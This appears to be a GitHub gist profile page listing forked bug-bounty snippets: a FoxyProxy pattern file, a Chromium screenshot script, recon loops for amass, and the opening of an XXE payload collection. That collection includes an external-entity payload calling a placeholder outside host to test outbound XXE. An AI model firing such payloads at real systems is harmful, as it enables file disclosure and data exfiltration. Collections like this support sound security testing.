Skip to content

Instantly share code, notes, and snippets.

View JeffreyShran's full-sized avatar
:octocat:

Dave Hanson JeffreyShran

:octocat:
View GitHub Profile
@JeffreyShran
JeffreyShran / bb-foxyproxy-pattern.json
Created June 24, 2020 09:30 — forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
{
"30523382": {
"className": "Proxy",
"data": {
"bypassFPForPAC": true,
"color": "#f57575",
"configUrl": "",
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
"cycle": false,
"enabled": true,
@JeffreyShran
JeffreyShran / screen.py
Created June 16, 2020 11:04 — forked from si9int/screen.py
Performing screenshots on URLS given via STDIN. Chromium and Chromedriver required! Configuration infile.
#!/usr/bin/env python3
# v.0.1 - by SI9INT (https://si9int.sh)
# Chromium and chromedriver required, be sure to check if both version are the same
# `mkdir screens` to get started, script won't create the folder
import queue, threading, sys
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
CHROME_PATH = '/usr/bin/chromium'
202.93.224.226
@JeffreyShran
JeffreyShran / WAHH_Task_Checklist.md
Created February 21, 2020 10:38 — forked from amotmot/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@JeffreyShran
JeffreyShran / amass_intel_for_loop
Created February 21, 2020 10:31 — forked from jhaddix/amass_intel_for_loop
Foir loop to run amass intel for easy killing of single thread
for i in $(cat yahoobgp); do echo""; echo "ASN $i";echo ""; amass.netdomains -asn $i;echo ""; done
@JeffreyShran
JeffreyShran / bgp.sh
Created February 21, 2020 10:31 — forked from jhaddix/bgp.sh
copy in bghp.he.net to this script and get amass command
#!/bin/bash
expand $1 |cut -d " " -f1|sed 's/AS//g'
echo ""
echo ""
lined=`expand $1 |cut -d " " -f1|sed 's/AS//g'| tr '\n' ','`
@JeffreyShran
JeffreyShran / XXE_payloads
Created December 4, 2019 16:15 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>